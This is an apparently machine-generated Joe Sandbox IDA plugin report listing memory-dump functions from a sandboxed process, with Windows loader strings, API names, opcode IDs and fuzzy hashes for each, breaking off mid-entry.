                                                  • String ID: @SM4$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                  • API String ID: 0-683077498
                                                  • Opcode ID: 67efce1676de98acf8bad52dadfdb56dbef6f7e959c89e19c45b0892d8c32028
                                                  • Instruction ID: 4c59e55f704a7fe9187bcd973b2f79cac70acaa9aac1c668d510cdb5d477f27c
                                                  • Opcode Fuzzy Hash: 67efce1676de98acf8bad52dadfdb56dbef6f7e959c89e19c45b0892d8c32028
                                                  • Instruction Fuzzy Hash: BC41BA79F00746CBEB01DF99E450B5D77B8EF95744F1084A9E800DB2A1EA3ACD44EB01
                                                  Strings
                                                  • GlobalFlag, xrefs: 3458B30F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3458B2B2
                                                  • @, xrefs: 3458B2F0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: a43e638be37cce7c21d3f7a54c93461b385a2948fcbbbe1d7fc478cadfb24478
                                                  • Instruction ID: 35bce4fb9058a5bec0edd5abb4abdd7a9374e344b3820f906b0ee6158cd507a6
                                                  • Opcode Fuzzy Hash: a43e638be37cce7c21d3f7a54c93461b385a2948fcbbbe1d7fc478cadfb24478
                                                  • Instruction Fuzzy Hash: E03130B5E00209AFEB10DF94DC80AEEBB7CEF44744F800469FA11AB251DB749A44DB94
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3457184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3457185B
                                                  • LdrpInitializeTls, xrefs: 34571851
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 500c2f05bb99c940327d8826ae5c38236869dc3ffe12f4a533493bc04745a334
                                                  • Instruction ID: a587f842eed00f50e79a94fa3d30a98b689916125115ba9fa2b351bc74b8daf1
                                                  • Opcode Fuzzy Hash: 500c2f05bb99c940327d8826ae5c38236869dc3ffe12f4a533493bc04745a334
                                                  • Instruction Fuzzy Hash: 8C31D171E01208EFF7108F64CC85B6A7BA9FB84395F410569F502F7281EB70EE45AB91
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 345885DE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  • Opcode ID: 010ec0b12f4ada884075b57696e9d2cd8dc7b2009f60d5ba40abecd41375b01a
                                                  • Instruction ID: 58486d15d28f3e6afeab5fff398948f55b789431b1818a58a88dd7ce3b28ba19
                                                  • Opcode Fuzzy Hash: 010ec0b12f4ada884075b57696e9d2cd8dc7b2009f60d5ba40abecd41375b01a
                                                  • Instruction Fuzzy Hash: E001263AF00604EFEB615F92EC84E5A3B65FF903A0F80096CE50167553CF21A881FE99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: bf622e9ab70d567f6ff75265b045780655d7dd59f93fa1a5009cd487811f8794
                                                  • Instruction ID: c16855596eacab5d65c4f0df5881550b91c2b18b413db70782bf301bda008ec8
                                                  • Opcode Fuzzy Hash: bf622e9ab70d567f6ff75265b045780655d7dd59f93fa1a5009cd487811f8794
                                                  • Instruction Fuzzy Hash: C232AFB4908355CFEB648F14D480B2EB7E5EF84744F91492EF9968B3A0E734D844EB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4fc99d461b7e9fa40818cad6f94960087f6656f99ee70f2be5a3c2b92a6aee97
                                                  • Instruction ID: 435d183d1980647c1d4bdfc01c671466e15916f841fb5e7b48022acdc3fdd7cd
                                                  • Opcode Fuzzy Hash: 4fc99d461b7e9fa40818cad6f94960087f6656f99ee70f2be5a3c2b92a6aee97
                                                  • Instruction Fuzzy Hash: FC31E039B01B06EFE781DF24C950A8AFB69FF84794F409125E90197A60DB70E821EF80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: e8f6e7619459aa40ab20727acf5287a4ce983af432c2c42fca87588ec1f08d1e
                                                  • Instruction ID: e548780021929d537ab7d4515a216932ae18b1b21815ac96d0c80b4e829ea0fd
                                                  • Opcode Fuzzy Hash: e8f6e7619459aa40ab20727acf5287a4ce983af432c2c42fca87588ec1f08d1e
                                                  • Instruction Fuzzy Hash: 716139B1E807189FEB15CFA8C840BADBBB9BF48740F50447EE549EB251EA30E941DB50
                                                  Strings
                                                  • RedirectedKey, xrefs: 345DB60E
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 345DB5C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  • Opcode ID: 81504957dffb7081a5bd8bd69d49c096f719314d23c84189558e21586cfbd4b2
                                                  • Instruction ID: 8c7f97580508220886cba1112d290e5a6f2582e1e79253a4ee0f089e5e1efd67
                                                  • Opcode Fuzzy Hash: 81504957dffb7081a5bd8bd69d49c096f719314d23c84189558e21586cfbd4b2
                                                  • Instruction Fuzzy Hash: C26105B5C01218EFEF11DF98C948ADEBBB9FF09714F50406AE405A7250DB359A45DF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 7acc425d3539d567424ee50f9d2b518ebd7affa7c76b33ef5a0c59521bba02e6
                                                  • Instruction ID: 664cf2c74aee483db8eae2454ab2d72de0ac3a558f33d0d0780b07de827bafb4
                                                  • Opcode Fuzzy Hash: 7acc425d3539d567424ee50f9d2b518ebd7affa7c76b33ef5a0c59521bba02e6
                                                  • Instruction Fuzzy Hash: 7B61BCB6E01749DFFB20CFA4D580B9DB7B1FF84308F908469D505AB692CB74A941EB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: 4c509ce6a5d6ad74eeedae25fcf2f5843ad99b1fd6e8da6d834a8387ddf90cfe
                                                  • Instruction ID: 4c9014978270971eb84e8d19e5bf84b6fbd112e152f43f2f2bb5bf6fc6962d65
                                                  • Opcode Fuzzy Hash: 4c509ce6a5d6ad74eeedae25fcf2f5843ad99b1fd6e8da6d834a8387ddf90cfe
                                                  • Instruction Fuzzy Hash: FD31DC75A08780CFE705CB68E850B5AB7E8EFD9754F40086DF854CB390EA30D905EB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O4$ O4
                                                  • API String ID: 0-2042910260
                                                  • Opcode ID: 09306c423ae0bca47e715234eb053735fdfc85d99a404f1f73d113c578c479d9
                                                  • Instruction ID: 7412cae5790d26169ceed645a1967ff1f1340a6f7cf99492adb2db647696c000
                                                  • Opcode Fuzzy Hash: 09306c423ae0bca47e715234eb053735fdfc85d99a404f1f73d113c578c479d9
                                                  • Instruction Fuzzy Hash: A531A23BE047119FE711DE24A890E6B77A9EFC4AA0F018969FC1597210EB34DC05AFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: 67340ab72df31a6cc14ebb4956ce0e8ea735dbc5c3b64105a27dc86faa247f4a
                                                  • Instruction ID: eb34679419911a5f71ab9e140138cca85c52dff1721bb8a9b0e65b135a51e31e
                                                  • Opcode Fuzzy Hash: 67340ab72df31a6cc14ebb4956ce0e8ea735dbc5c3b64105a27dc86faa247f4a
                                                  • Instruction Fuzzy Hash: 823190B194A301EFE311CF28C880A5FBBE8FB95694F44092EF99487250D634DD09AB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[_4@[_4
                                                  • API String ID: 0-595470575
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #%u
                                                  • API String ID: 0-232158463
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0h_4
                                                  • API String ID: 0-2335967243
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O4
                                                  • API String ID: 0-3257426027
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction ID: 798dc6eb0f22e3e411fa27bfae9ba3a36505d137aa25a9ad84103c4407fbef64
                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction Fuzzy Hash: 2141D479E01619EFEF14CF84D880BBEBBB5FF81745F40845AE945A7240DB30A941EB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  • Opcode ID: ea512a7be9df51862ae637a6ddc903fb17d15e9cfa4df077e57d908c5ed4b786
                                                  • Instruction ID: 3595dc62387af874123b67c8ff90318c600746705809c1bdfed72e13c2d4367a
                                                  • Opcode Fuzzy Hash: ea512a7be9df51862ae637a6ddc903fb17d15e9cfa4df077e57d908c5ed4b786
                                                  • Instruction Fuzzy Hash: 2A41A7B0A06301DFE304CF19D480B16BBE4EF99710F5885AEE459CB282DB71C982CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 3Kw3Kw
                                                  • API String ID: 3446177414-3715601790
                                                  • Opcode ID: 3a1c56c96f7372100347db7416f52cbcea972413c9b168a36cf9b18b44a32b5c
                                                  • Instruction ID: 605932a4612f2fd3f608dbadb051cfe5abe79d160f31274d072ad891084b5aba
                                                  • Opcode Fuzzy Hash: 3a1c56c96f7372100347db7416f52cbcea972413c9b168a36cf9b18b44a32b5c
                                                  • Instruction Fuzzy Hash: 5321CC76A00B10EFEB218F58C840B1A7BF4EB84BA4F51087DA515AB350DA32D945CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 4d537d49f59d58d0711f5c2c9a605b4ced1c32d5aef6f88452c97d8b31e742f3
                                                  • Instruction ID: e6ed358216b7693e38c975204fed28e560b545b0e7c070d7c37c87f1e022f9c8
                                                  • Opcode Fuzzy Hash: 4d537d49f59d58d0711f5c2c9a605b4ced1c32d5aef6f88452c97d8b31e742f3
                                                  • Instruction Fuzzy Hash: 1C31847AD00619AFEB16CB58D845D6FBB78EF82760F51457DE801AB250DB309E04E790
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 285437feb7969135833037c4f5cfcecd25ca9e306e93a3475f0851a594af60d0
                                                  • Instruction ID: 3fce0b0eebb5f2f43fb93c4adb3cf469fdbe592a48a65ebe625824b6a94d0d21
                                                  • Opcode Fuzzy Hash: 285437feb7969135833037c4f5cfcecd25ca9e306e93a3475f0851a594af60d0
                                                  • Instruction Fuzzy Hash: A6429F75E006168FEB08CF59D4905BEB7B6FF88354F5485AEE452AB360DB30E842DB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 734440c9c212c0e263ca7735cd1a5077c9034dbe4532eff60200e57858aa69ba
                                                  • Instruction ID: 484027632ed9ce041dabb328464e8f19596c6313eee87a2c78304619ce9cdd9a
                                                  • Opcode Fuzzy Hash: 734440c9c212c0e263ca7735cd1a5077c9034dbe4532eff60200e57858aa69ba
                                                  • Instruction Fuzzy Hash: 2932EE78E01755CFEB14CF69C8507AEB7F6BF84308F60451DE446AB2A4DB39A842EB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a11a94519608a67884d9b569ed51dce4006ec0a9895032a0d2749570c2e5ffa4
                                                  • Instruction ID: 1ceb9daf22c5febe540142e3a9c98a563c3545a9e1c783d7fe6a1522e7245559
                                                  • Opcode Fuzzy Hash: a11a94519608a67884d9b569ed51dce4006ec0a9895032a0d2749570c2e5ffa4
                                                  • Instruction Fuzzy Hash: 34D1DB75A0070ADFEF24CF65CC80ABA73A5AF44344F45467EE912DB290EB32D956CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ae07511d5af076466cf31a255f046fac57d128906cff3024b2cbbf77d74b826
                                                  • Instruction ID: ada454a1060797cd68c26f8672b20f18d6139c84658a102d7b91f3d347c71802
                                                  • Opcode Fuzzy Hash: 8ae07511d5af076466cf31a255f046fac57d128906cff3024b2cbbf77d74b826
                                                  • Instruction Fuzzy Hash: 71C1BF79E002169FEB18CF58C840BAEF7B6AF94314F54C66DE815AB280D738E945DF90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1002123147720adf95d42aeb62a136951fbc30fb372dbcdfaf78113aa27be9c7
                                                  • Instruction ID: dc3208fa9f3d4ae246d04c952115f7d07da44f063390fe6e98e3c85ad75df814
                                                  • Opcode Fuzzy Hash: 1002123147720adf95d42aeb62a136951fbc30fb372dbcdfaf78113aa27be9c7
                                                  • Instruction Fuzzy Hash: BED1F1B5A00204DFEB41CF69C984B8A7BE9BF49340F4445BAED099F356EB31D905DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c22b81645df29878ee7f0868a51df8deb6e8f1de39b57ea26b73f74b98e8ccc
                                                  • Instruction ID: 7c26f571d9e4e5e40222511591795af321c3e1dd6ffb9689840631e037ab7695
                                                  • Opcode Fuzzy Hash: 4c22b81645df29878ee7f0868a51df8deb6e8f1de39b57ea26b73f74b98e8ccc
                                                  • Instruction Fuzzy Hash: F0C114B5E01609DFDB15CFA8D840A9EBBF4FB88754F50846AE416EB360EB34A901DF50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                  • Instruction ID: f1ad49f1b3b017a37841979f3948f11a711764e2c699e3a93d12961a5863ee4f
                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                  • Instruction Fuzzy Hash: B1B10E32F00745EFFB11CBA5C890BAEBBBAAF85704F500568E5529B681DB34ED40EB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 631e9fba1f0ddca371201489ff11a70fa85ac0779cedc3722859b3d4480be6e5
                                                  • Instruction ID: b62b116182091c2b6c6aca935297da2c807d647bb5cdacf0b713720b3e1b2c68
                                                  • Opcode Fuzzy Hash: 631e9fba1f0ddca371201489ff11a70fa85ac0779cedc3722859b3d4480be6e5
                                                  • Instruction Fuzzy Hash: 06C13878A08340CFE764CF15C494BABB7E4BF88348F44896DE98987291D774E908DF92
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 348f4fc0f8898cc57ad1d4372e9d2c83f662846b821cfcccf7e3c8099a631cd4
                                                  • Instruction ID: 46ca887ed1d99d9a5af1e059c0fa3110086a10080e69c56b8035c00e2d2b7bbf
                                                  • Opcode Fuzzy Hash: 348f4fc0f8898cc57ad1d4372e9d2c83f662846b821cfcccf7e3c8099a631cd4
                                                  • Instruction Fuzzy Hash: AFA1BD76F00715DFEB14CF69D980BAABBB5FF44754FA04029E9059B381EB34A811EB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca3962289248b4eaef207d5c3f89aa15b846d1387a51afbdd57593e839695166
